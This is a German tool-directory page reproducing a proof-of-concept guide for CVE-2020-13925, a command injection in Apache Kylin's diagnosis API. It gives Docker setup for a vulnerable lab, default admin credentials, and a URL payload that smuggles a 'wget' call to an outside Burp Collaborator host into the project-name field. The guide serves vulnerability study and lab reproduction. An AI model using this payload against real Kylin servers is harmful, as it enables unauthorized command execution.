Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2020-13925 — PoC und Reproduktionsanleitung für CVE-2020-13925, eine Command Injection-Schwachstelle in der Diagnose-API von Apache Kylin, mit Docker-basiertem Laboraufbau und Ausnutzungsschritten. | Kitploit
Tools/GitHubGitHub/bit4woo/cve-2020-13925
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungLabs & Praxis
GitHubbit4woo/cve-2020-13925

CVE-2020-13925

PoC und Reproduktionsanleitung für CVE-2020-13925, eine Command Injection-Schwachstelle in der Diagnose-API von Apache Kylin, mit Docker-basiertem Laboraufbau und Ausnutzungsschritten.

Repository anzeigen
161vor 6 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2020-13925

Umgebung einrichten

Siehe https://github.com/apache/kylin zur Bereitstellung der Umgebung mit Docker. Ändern Sie die Version auf 3.0.1 (die verwundbare Version). Sie können -m 8G \ entfernen, da es die Größe des zugewiesenen Arbeitsspeichers festlegt.

Greifen Sie dann auf http://host:7070/kylin/login zu. Der Standard-Benutzername und das Standard-Passwort sind ADMIN/KYLIN.

root@kitploit:~
docker pull apachekylin/apache-kylin-standalone:3.0.1

docker run -d \
    -m 8G \
    -p 7070:7070 \
    -p 8088:8088 \
    -p 50070:50070 \
    -p 8032:8032 \
    -p 8042:8042 \
    -p 16010:16010 \
    apachekylin/apache-kylin-standalone:3.0.1
    
docker run -d \
    -p 7070:7070 \
    -p 8088:8088 \
    -p 50070:50070 \
    -p 8032:8032 \
    -p 8042:8042 \
    -p 16010:16010 \
    apachekylin/apache-kylin-standalone:3.0.1

PoC zur Schwachstellenverifikation

root@kitploit:~
Ursprüngliche Anfrage:
http://host:port/kylin/api/diag/project/learn_kylin/download

PoC-Anfrage, GET-Methode:
http://host:port/kylin/api/diag/project/%7c%7cwget%20h1j96qoac5o9mbqpkewkhxxa218rwg.burpcollaborator.net%7c%7c/download

Ersetzen Sie einfach den Projektnamen "learn_kylin" durch die folgende Payload:
||wget h1j96qoac5o9mbqpkewkhxxa218rwg.burpcollaborator.net||

Reproduktionsschritte

Rufen Sie System-Configuration-Diagnosis auf. Lösen Sie die Anfrage zum Herunterladen der Diagnoseinformationen aus: http://host:port/kylin/api/diag/project/learn_kylin/download image.png

Ersetzen Sie den Projektnamen "learn_kylin" durch die obige Payload und greifen Sie darauf zu.

image.png

Referenzen

https://mp.weixin.qq.com/s/LdEgENX2_b8tb12n4H9KJQ

Tool herunterladen